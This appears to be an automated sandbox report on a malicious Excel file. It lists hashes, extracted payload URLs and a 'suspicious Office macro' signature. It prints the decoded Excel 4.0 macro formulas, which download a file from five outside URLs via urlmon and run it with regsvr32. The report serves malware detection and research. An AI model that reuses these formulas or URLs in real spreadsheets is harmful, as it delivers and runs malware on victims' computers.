General
-
Target
00317f578a6a3ce135267bab132f4267fe7aa4b7bf602f461937ace5f10f5b21
-
Size
90KB
-
MD5
f6a6144fe44058a77a07f3acdcb14365
-
SHA1
d698c5ba03607569dc3d09ad3de298e1f2dc4d63
-
SHA256
00317f578a6a3ce135267bab132f4267fe7aa4b7bf602f461937ace5f10f5b21
-
SHA512
9b1fa897bd9a9815013e1082ac248300a55334d637a7d0d5a6ecc739b1687f5207437fcd605619fa417dd7ff680795edbc028d59889a547bbed923abe72dd6d3
-
SSDEEP
1536:DQBrnXpnyV+ns1BVi/IEh2hx0Lx3bKhllGGx0vKCEjdQjqEk+xXPd:qDpyVEoBo6hKb4llGsQjbxfd
Malware Config
Extracted
http://www.ajaxmatters.com/c7g8t/zbBYgukXYxzAF2hZc/
http://www.beholdpublications.com/home/BABxyyWZx8Vu/
http://explorationit.com/screwing/AxLm/
http://donboscoschoolputhuppally.org/wp-content/UuQ7LBsPoGu9Q/
http://myclassroomtime.com/mongery/ZlPsROtQiXIujmJmAA/
-
formulas
=FORMULA() =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ajaxmatters.com/c7g8t/zbBYgukXYxzAF2hZc/","..\xxw1.ocx",0,0) =IF('EGFAGAGDGE'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.beholdpublications.com/home/BABxyyWZx8Vu/","..\xxw1.ocx",0,0)) =IF('EGFAGAGDGE'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://explorationit.com/screwing/AxLm/","..\xxw1.ocx",0,0)) =IF('EGFAGAGDGE'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://donboscoschoolputhuppally.org/wp-content/UuQ7LBsPoGu9Q/","..\xxw1.ocx",0,0)) =IF('EGFAGAGDGE'!D21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://myclassroomtime.com/mongery/ZlPsROtQiXIujmJmAA/","..\xxw1.ocx",0,0)) =IF('EGFAGAGDGE'!D23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx") =RETURN()
Signatures
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
Files
-
00317f578a6a3ce135267bab132f4267fe7aa4b7bf602f461937ace5f10f5b21